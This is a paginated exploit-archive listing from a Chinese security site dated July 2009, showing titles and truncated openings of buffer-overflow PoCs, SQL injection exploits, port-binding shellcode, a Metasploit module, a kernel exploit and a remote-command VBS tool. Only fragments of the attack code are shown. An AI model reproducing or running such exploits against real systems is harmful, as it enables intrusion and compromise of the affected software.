首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
M3U/M3L to ASX/WPL 1.1 (ASX,M3U,M3L) Local BOF PoC
  日期:2009-07-13 11:00:29 点击:19 评论:0
#!/usr/bin/perl # ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ## # # M3U/M3L to ASX/WPL v1.1 (asx,m3u,m3l) Local Stack Overflow POC ## # # Download: http://proletsoft.freeservers.com/mmb/m3utoasx.html ## ## Welcom Bac
Morcego CMS <= 1.7.6 Remote Blind SQL Injection Exploit
  日期:2009-07-13 10:59:57 点击:33 评论:0
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ - __ __ _ __ - + ____/ /___ ______/ /__ (_)___ / /_____ _____ + - / __ / __ `/ ___/ //_/ / / __ / //_/ _ / ___/ - + / /_/ / /_/ / / / , / / /_/ / , / __/ / + - __,_/__,_/_/ /_/|_|_/ /_
Linux/x86 Port Binding Shellcode (xor-encoded) 152 bytes
  日期:2009-07-13 10:59:07 点击:47 评论:0
/* Author: Rick Email: rick2600@hotmail.com OS: Linux/x86 Description: Port Bind 4444 ( xor-encoded ) -------------------------------------------------------------------- section .text global _start _start: ;socket (PF_INET, SOCK_STREAM, 0) push byt
AwingSoft Web3D Player (WindsPly.ocx) Remote BOF PoC
  日期:2009-07-13 10:58:40 点击:30 评论:0
----------------------------------------------------------------------------- AwingSoft Web3D Player (WindsPly.ocx) SceneURL() Remote Buffer Overflow url: http://www.awingsoft.com/ Author: shinnai mail: shinnai[at]autistici[dot]org site: http://www.
eEye Retina WiFi Security Scanner 1.0 (.rws Parsing) Buffer Overflow PoC
  日期:2009-07-13 10:57:11 点击:64 评论:0
#!/usr/bin/python # # # * Title: Retina WiFi Security Scanner 1.0 (.rws parsing) Buffer Overflow Vulnerability # # # * Summary: Retina WiFi Scanner is a tool to be used to detect IEEE 802.11 (WiFi) based devices. # * Vendor: eEye Digital Security In
OtsAv DJ/TV/Radio Multiple Local Heap Overflow PoCs
  日期:2009-07-13 10:56:12 点击:25 评论:0
----------------------------------the first Poc------------------------------------ #!/usr/bin/perl # OtsAv DJ [.olf] Local Heap Overflow Poc # Down : http://serv-08.download.otszone.com/download.cgi/otsavdjtrialsetup.exe?A=13JTHRVWJLLLZ5JG2AYRNSMN%
ToyLog 0.1 SQL Injection Vulnerability/RCE Exploit
  日期:2009-07-13 10:55:19 点击:23 评论:0
--+++=====================================================================================+++-- --+++====== ToyLog 0.1 SQL Injection Vulnerability/Remote Command Execution Exploit ======+++-- --+++====================================================
MS Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit
  日期:2009-07-13 10:54:29 点击:46 评论:0
#!/usr/bin/env python ###################################################################################### # MS Internet Explorer 7 DirectShow (msvidctl.dll) Heap Spray (Advisory 972890) # ##########################################################
Photo DVD Maker Pro <= 8.02 (.pdm) Local BOF Exploit (SEH)
  日期:2009-07-13 10:53:19 点击:42 评论:0
# _ _ _ __ _ _ _ #| || | (_) ___ / | |__ | | | #| __ | | | (_- | () | | / / |_ _| #|_||_| |_| /__/ __/ |__ |_| # #[+] Bug : Photo DVD Maker (.pdm) Local Buffer Overflow Exploit (SEH) #[+] Refer : Secunia advisory 35709 #[+] Exploit : His0k4 #[+
PatPlayer 3.9 (M3U File) Local Heap Overflow PoC
  日期:2009-07-13 10:52:16 点击:28 评论:0
#!/usr/bin/perl # # # # PatPlayer v3.9 (M3U File) Local Heap Overflow PoC # # # Found By : Cyber-Zone (ABDELKHALEK) # # # Greatz : All friends (Jiko :)) Sec-r1z.CoM ..... IQ-TY .... # # #EAX 41414141 #ECX 00000000 #EDX 004F1FC0 ASCII AAAAAAAAAAAAAAA
Microsoft Internet Explorer (AddFavorite) Remote Crash PoC
  日期:2009-07-10 13:47:01 点击:23 评论:0
------------------------------------------- IE Add Favourites Stack Buffer Overflow POC Sberry, Compaq ------------------------------------------- html head script language=JavaScript type=Text/Javascript function go() { var str =unescape('%u4141');
Universe CMS 1.0.6 (vnews.php id) Remote SQL Injection Exploit
  日期:2009-07-10 13:46:02 点击:29 评论:0
#!/usr/bin/perl -w # Universe CMS 1.0.6 (id) Remote SQL Injection Exploit # Demo : http://www.universe.uni.org.pl # Download : http://www.universe.uni.org.pl/upload/universecms106.rar # Found by : Mr.tro0oqy Yemeni ana # E-mail : t.4@windowslive.com
TalkBack 2.3.14 Multiple Remote Vulnerabilities
  日期:2009-07-10 13:45:29 点击:32 评论:0
JIKO No-exploit.Com Download:http://scripts.oldguy.us/talkback/downloads2/talkback2.3.14.zip Script : talkback V 2.3.14 Dork:inurl:test.php Powered by TalkBack -------------------------------------------- Edit Comment ~[+] talkback/comments.php?edit=
Mlffat 2.2 Remote Blind SQL Injection Exploit
  日期:2009-07-10 13:43:27 点击:52 评论:0
?php ini_set(max_execution_time,0); print_r(' || || | || o_,_7 _|| . _o_7 _|| q_|_|| o_///_, ( : / (_) / ( . ___________________ _/QQQQQQQQQQQQQQQQQQQ__ [q] Mlffat 2.2 Blind SQL Inj. __/QQQ/````````````````QQQ___ _/QQQQQ/ QQQQQQ [q] Cookie 3 /Q
otsAV DJ 1.85.064 (.ofl File) Local Heap Overflow PoC
  日期:2009-07-10 13:42:48 点击:31 评论:0
#!/usr/bin/perl # Found By :: HACK4LOVE # all i want say welcom back 3asfh # otsAV DJ 1.85.064 (.ofl File) Local Heap Overflow PoC # http://x.download.otszone.com/static/otsavdjtrialsetup.exe ##########################################################
Nwahy Dir 2.1 Arbitrary Change Admin Password Exploit
  日期:2009-07-10 13:40:03 点击:57 评论:0
? /* [ Nwahy Dir v2.1 Change Admin Password Exploit ] [-] Author : rEcruit [-] Mail : recru1t[@]ymail.com [-] Download : http://nwahy.com/showdownload-3105.html [-] Vuln in ./admincp/admininfo.php [code] $u = addslashes($_COOKIE['username']); $query
Linux Kernel <= 2.6.28.3 set_selection() UTF-8 Off By One Local Exploit
  日期:2009-07-10 13:38:27 点击:190 评论:0
/* CVE-2009-1046 Virtual Console UTF-8 set_selection() off-by-one(two) Memory Corruption * Linux Kernel = 2.6.28.3 * * coded by: sgrakkyu at antifork.org * http://kernelbof.blogspot.com/2009/07/even-when-one-byte-matters.html * * Dedicated to all pe
Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption exploit (meta)
  日期:2009-07-09 17:02:29 点击:145 评论:0
## # msvidctl_mpeg2.rb # # Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption exploit for the Metasploit Framework # # Tested successfully on the following platforms (fully patched 06/07/09): # - Internet Explorer 6, Windows XP SP2 # - Int
Rcmd.vbs 1.01修正版
  日期:2009-07-09 10:27:53 点击:64 评论:0
原来是NP写的,代码在这里 http://hi.baidu.com/myvbscript/blog/item/92e5d93dd18218ce9e3d6227.html 我修正了几个小bug。加了一个在对方机器上直接生成一个down.vbs,用来下载用。这个down.vbs的用法看这里: http://hi.baidu.com/myvbscript/blog/item/b64592267c8e
MySQL version 5.0.45 suffers from a format string vulnerability. Proof of concep
  日期:2009-07-09 10:25:40 点击:88 评论:0
MySQL (tested: Version 5.0.45 on CentOS (Linux)) Format String VulnerabilityMySQL General Available (GA) Release is vulnerable.Latest MySQL Version is not vulnerable since the bug if ifdef'ed off.from mysql-5.0.75 source (mysql-5.0.75.tar.gz) in the
共637页/12733条记录 首页 上一页 [440] [441] [442] 443 [444] [445] [446] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved